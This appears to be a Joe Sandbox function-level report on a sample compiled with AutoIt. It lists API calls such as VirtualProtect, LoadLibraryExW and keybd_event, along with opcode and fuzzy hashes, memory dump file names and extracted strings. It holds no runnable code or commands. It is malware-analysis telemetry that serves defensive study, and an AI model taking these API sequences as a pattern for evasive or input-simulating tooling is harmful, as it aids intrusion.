API String ID:
Opcode ID: c6a40b6b38c96822e8f1d2f6fccb2f6f9bddad49e93c39cc65ac40a4b2843a74
Instruction ID: 2925b4d74a811d494d697de37f94356705901f8b2b4be03619f44b9959a0f44b
Opcode Fuzzy Hash: c6a40b6b38c96822e8f1d2f6fccb2f6f9bddad49e93c39cc65ac40a4b2843a74
Instruction Fuzzy Hash: 4C31B2B1D0C3409ACB35CB28C5483B9BBB06BA5720F4C869BE0878F3A2D6799D04D752

Function 00420C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 00420CB7

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89

Function 0043FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0043FCB7

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 3d1cb9615f3ea5f5f5e6361dd344e1a47d9da12f05ea6428eae25d07ae27aef1
Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
Opcode Fuzzy Hash: 3d1cb9615f3ea5f5f5e6361dd344e1a47d9da12f05ea6428eae25d07ae27aef1
Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A

Function 00407B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407BB3

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
Instruction ID: e277250e627d10e0330490a348a3b32a96e3d7cb5ffc8e96ca57e5c84c001af0
Opcode Fuzzy Hash: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
Instruction Fuzzy Hash: 86210072A14A19EBDB108F26E84176E7BB4FB18354F21853FE886C51D0EB38E490D74E

Function 0040784B Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407899

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 4bc516ce2b159df6ae561d16dde780559593b119f0329b2b52b7213471dda11b
Instruction ID: 03ec0e1ddcc1c42b0f32453fdad85b9eaadac3e2e088d633c8de65ee5d072679
Opcode Fuzzy Hash: 4bc516ce2b159df6ae561d16dde780559593b119f0329b2b52b7213471dda11b
Instruction Fuzzy Hash: 4111D532A04215ABD714EF28D485C6AB7A9EF85324724812FE905DB3D1DB35FC01C799

Function 00404DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF

Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F

Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4

Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99

Function 0043FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0043FD91

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1d552beb7b604a3469ce90b415d42699b56cfd27380834e93100c85a5b232174
Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
Opcode Fuzzy Hash: 1d552beb7b604a3469ce90b415d42699b56cfd27380834e93100c85a5b232174
Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B

Function 00407DE1 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407E22

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 219463ed73227fddf06e24bb3e437384d6eb53c69c69e2cd7c202b796966a717
Instruction ID: 8ac4692a4edd8b950221785d74b091900f33ceedfbe0b692f8040025a9c6a4da
Opcode Fuzzy Hash: 219463ed73227fddf06e24bb3e437384d6eb53c69c69e2cd7c202b796966a717
Instruction Fuzzy Hash: E90126B26013016EC3209F29D806FA7BBD4AB04360F10853FF61ACA1D1EA79F84087D8

Function 00AD6086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00AD608C

Memory Dump Source

Source File: 00000000.00000002.1408264425.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_I3LPkQh2an.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2d1f71e86824403484db654a56edb8165697675e6a8703c938853cbde6cb8151
Instruction ID: 66424852c22ab8c46a89255664aab2045572d92f8f02231804377afa08784ac6
Opcode Fuzzy Hash: 2d1f71e86824403484db654a56edb8165697675e6a8703c938853cbde6cb8151
Instruction Fuzzy Hash: 37015EB1C0D7409ECB258B3484157B67BB46F5A760F09CB9BE0879B3A2D6748D04CB62

Function 00424863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 004248A6

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D

Function 00404E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84

Function 00420791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694

Function 0042525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00425266

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99

Function 00E87A80 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 00E87A91

Memory Dump Source

Source File: 00000000.00000002.1409377799.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e85000_I3LPkQh2an.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 6f0e4bde5b04dacab323029a3c68c743e3bb5227d689419be1b4d142f666bdaa
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: A3E0E67498410DDFDB00EFB4D94969E7FB4EF04301F1001A1FD05E2280D6309E508B62

Non-executed Functions

Function 0048CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
SendMessageW.USER32 ref: 0048CC29
_wcsncpy.LIBCMT ref: 0048CC95
GetKeyState.USER32(00000011), ref: 0048CCB6
GetKeyState.USER32(00000009), ref: 0048CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
GetKeyState.USER32(00000010), ref: 0048CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
SendMessageW.USER32 ref: 0048CD33
SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
SetCapture.USER32(?), ref: 0048CE69
ClientToScreen.USER32(?,?), ref: 0048CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
ReleaseCapture.USER32 ref: 0048CF00
GetCursorPos.USER32(?), ref: 0048CF3A
ScreenToClient.USER32(?,?), ref: 0048CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
SendMessageW.USER32 ref: 0048CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
SendMessageW.USER32 ref: 0048D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
GetCursorPos.USER32(?), ref: 0048D08D
ScreenToClient.USER32(?,?), ref: 0048D09A
GetParent.USER32(?), ref: 0048D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
SendMessageW.USER32 ref: 0048D154
ClientToScreen.USER32(?,?), ref: 0048D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
SendMessageW.USER32 ref: 0048D22F
ClientToScreen.USER32(?,?), ref: 0048D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5

Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC

GetWindowLongW.USER32(?,000000F0), ref: 0048D351

Strings

F, xrefs: 0048D235
@GUI_DRAGID, xrefs: 0048CE9C
pbL, xrefs: 0048CEAF

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pbL
API String ID: 3977979337-2097280626
Opcode ID: 4f16bd0a54bb31305c98b4c410e4e88b7a309b179b874218d8dc8bbaa358dfdb
Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
Opcode Fuzzy Hash: 4f16bd0a54bb31305c98b4c410e4e88b7a309b179b874218d8dc8bbaa358dfdb
Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A

Function 00416F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004171C3
_memset.LIBCMT ref: 00417539
_memmove.LIBCMT ref: 004176AC

Strings

[:<:]], xrefs: 00417479
Q\E, xrefs: 00417FCB
DEFINE, xrefs: 00452103
\b(?<=\w), xrefs: 00453773
3cA, xrefs: 004523A0
_A, xrefs: 004523CB
\b(?=\w), xrefs: 00453769
]K, xrefs: 00451A22
[:>:]], xrefs: 00417492
P\K, xrefs: 00451AB8

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
API String ID: 1357608183-1426331590
Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48

Function 004048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 004048DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
IsIconic.USER32(?), ref: 0043D66E
ShowWindow.USER32(?,00000009), ref: 0043D67B
SetForegroundWindow.USER32(?), ref: 0043D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
GetCurrentThreadId.KERNEL32 ref: 0043D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
SetForegroundWindow.USER32(?), ref: 0043D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
keybd_event.USER32(00000012,00000000), ref: 0043D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
keybd_event.USER32(00000012,00000000), ref: 0043D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
keybd_event.USER32(00000012,00000000), ref: 0043D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
keybd_event.USER32(00000012,00000000), ref: 0043D71E
SetForegroundWindow.USER32(?), ref: 0043D721
AttachThreadInput.USER32(?,?,00000000), ref: 0043D748

Strings

Shell_TrayWnd, xrefs: 0043D660

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
